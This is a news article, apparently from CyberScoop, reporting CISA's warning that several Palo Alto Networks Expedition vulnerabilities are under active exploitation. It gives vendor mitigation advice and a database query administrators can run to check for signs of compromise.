The Cybersecurity and Infrastructure Security Agency warned Thursday that a vulnerability in Palo Alto Networks’ firewall management software is actively being exploited in the wild, following last week’s attacks that exploited other flaws in the same software.

The two bugs in Palo Alto’s Expedition tool, tracked as CVE-2024-9463 and CVE-2024-9465, could expose firewall credentials and affect versions 1.2.96 and below, according to the vendor alert. The software is billed as a migration tool from multiple vendors to Palo Alto software. CISA did not provide further details on possible attackers or victims.

Palo Alto Networks’ alert notes that the company has seen exploits “against a limited number of firewall management interfaces which are exposed to the internet. We are actively investigating this activity.”

However, CISA’s alert comes a week after warning of an active exploit of another Expedition bug that affected version 1.2.92 and older versions, tracked as CVE-2024-5910.

CISA added CVE-2024-5910 to the KEV catalog Nov. 7 but the software vendor initially published the bug report in July. The vulnerability stems from missing authentication in the firewall deployment and management software and allows for administration account takeover with network access. The vulnerability has a CVSS score of 9.3 and is also tracked as PAN-SA-2024-0015 by Palo Alto Networks.

Palo Alto released an advisory about the CVE-2024-5910 bug in October and subsequently updated the alert Thursday.  Exploitation of CVE-2024-5910 puts at risk “configuration secrets, credentials, and other data imported” into the product, Palo Alto said in the alert. 

CISA’s addition of the vulnerability to the KEV means that federal agencies are required to ensure mitigate the risk within a set time.

The cybersecurity firm Horizon3.ai dove into the bug and found three additional vulnerabilities in the software: CVE-2024-9464, CVE-2024-9465 and CVE-2024-9466.

Palo Alto advised users to shut off Expedition if it is not in use and upgrade to the latest version. Network access to Expedition has been restricted.

Concerning CVE-2024-9465, administrators should “check for an indicator of compromise with the following command on an Expedition system (replace “root” with your username if you are using a different username):

mysql -uroot -p -D pandb -e “SELECT * FROM cronjobs;”

Palo Alto noted that any records returned would indicate a compromise, but also warned that systems could still be infected if nothing is returned.

The post More bugs in Palo Alto Expedition see active exploitation, CISA warns appeared first on CyberScoop.

Leave a Reply

Your email address will not be published. Required fields are marked *

Explore More

Ransomware and AI-Powered Hacks Drive Cyber Investment

May 21, 2024 0 Comments 0 tags

The rise in ransomware and AI generated attacks has contributed to accelerate investment into cyber defenses, Infosecurity Europe found in a new study

Read More

CISA Releases One Industrial Control Systems Advisory

March 19, 2024 0 Comments 0 tags

CISA released one Industrial Control Systems (ICS) advisory on March 19, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-24-079-01 Franklin Fueling System

Read More

Upcoming Speaking Engagements

June 14, 2024 0 Comments 0 tags

This is a current list of where and when I am scheduled to speak: I’m appearing on a panel on Society and Democracy at ACM Collective Intelligence in Boston, Massachusetts.

Read More